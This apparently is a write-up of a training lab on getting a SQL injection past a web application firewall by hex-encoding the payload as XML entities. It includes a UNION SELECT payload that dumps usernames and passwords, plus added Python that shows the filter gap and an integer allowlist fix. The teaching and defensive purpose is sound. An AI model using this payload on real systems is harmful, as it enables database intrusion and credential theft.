HINT
A web application firewall (WAF) will block requests that contain obvious signs of a SQL injection attack. You’ll need to find a way to obfuscate your malicious query to bypass this filter. We recommend using the Hackvertor extension to do this.
1. productId and storeId are sent in XML format:

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
    <productId>1</productId>
    <storeId>1</storeId>
</stockCheck>
2. Send the request to Repeater.
3. In Burp Repeater, probe the storeId to see whether your input is evaluated. For example, try replacing the ID with a mathematical expression that evaluates to another potential ID, such as: <storeId>1+1</storeId>
4. Observe that your input appears to be evaluated by the application, returning the stock for different stores.
5. As you’re injecting into XML, try obfuscating your payload using XML entities.
6. One way to do this is the Hackvertor extension.
7. Highlight your input, right-click, then select Extensions > Hackvertor > Encode > dec_entities/hex_entities.
8. Inject a query with the payload below into the storeId:
<@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities>
The payload above displays the usernames and passwords from the users table, because the WAF inspects the raw request body (where only numeric character references appear) while the XML parser decodes the entities back into the original SQL before it reaches the database query.
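To make the bypass concrete from the defending side, here is an added Python example (not from the original post or the lab) that reproduces the gap: a signature check on the raw body misses the hex-entity form of the payload, while the same check applied after XML parsing catches it, and a strict integer allowlist on the decoded storeId rejects both the obfuscated payload and the 1+1 probe. The request bodies and the `stock_check_body` helper are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed request body mirroring the lab's stock-check XML (helper is not from the page).
def stock_check_body(store_id: str) -> str:
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            f'<stockCheck><productId>1</productId><storeId>{store_id}</storeId></stockCheck>')

# The page's payload as the hex_entities tag emits it: every character becomes a numeric
# character reference, so the strings "UNION" and "SELECT" never appear literally on the wire.
HEX_ENTITY_PAYLOAD = (
    "&#x31;&#x20;&#x55;&#x4e;&#x49;&#x4f;&#x4e;&#x20;"              # "1 UNION "
    "&#x53;&#x45;&#x4c;&#x45;&#x43;&#x54;&#x20;"                     # "SELECT "
    "&#x75;&#x73;&#x65;&#x72;&#x6e;&#x61;&#x6d;&#x65;&#x20;"         # "username "
    "&#x7c;&#x7c;&#x20;&#x27;&#x7e;&#x27;&#x20;&#x7c;&#x7c;&#x20;"   # "|| '~' || "
    "&#x70;&#x61;&#x73;&#x73;&#x77;&#x6f;&#x72;&#x64;&#x20;"         # "password "
    "&#x46;&#x52;&#x4f;&#x4d;&#x20;&#x75;&#x73;&#x65;&#x72;&#x73;"   # "FROM users"
)

SQLI_SIGNATURE = re.compile(r"\bUNION\b.*?\bSELECT\b", re.IGNORECASE | re.DOTALL)

def naive_waf_blocks(raw_body: str) -> bool:
    """Signature match on the raw request text: what the lab's WAF effectively does."""
    return bool(SQLI_SIGNATURE.search(raw_body))

def decoded_store_id(raw_body: str):
    """Parse the XML so character references are resolved; None if malformed or missing."""
    try:
        root = ET.fromstring(raw_body.encode("utf-8"))
    except ET.ParseError:
        return None
    node = root.find("storeId")
    return None if node is None else (node.text or "").strip()

def normalised_waf_blocks(raw_body: str) -> bool:
    """Same signature, but applied to the entity-decoded field value (unparseable = block)."""
    value = decoded_store_id(raw_body)
    return value is None or bool(SQLI_SIGNATURE.search(value))

def store_id_is_valid(raw_body: str) -> bool:
    """Application-side fix: accept only a bare integer, then bind it as a query parameter."""
    value = decoded_store_id(raw_body)
    return value is not None and value.isdigit()
```

The allowlist check is the real fix; the normalising filter only shows that a WAF must inspect input in the form the backend parser will see it.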
Feel free to ask questions via LinkedIn, and to buy me a coffee :)
Thank you for reading!
Happy hunting ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng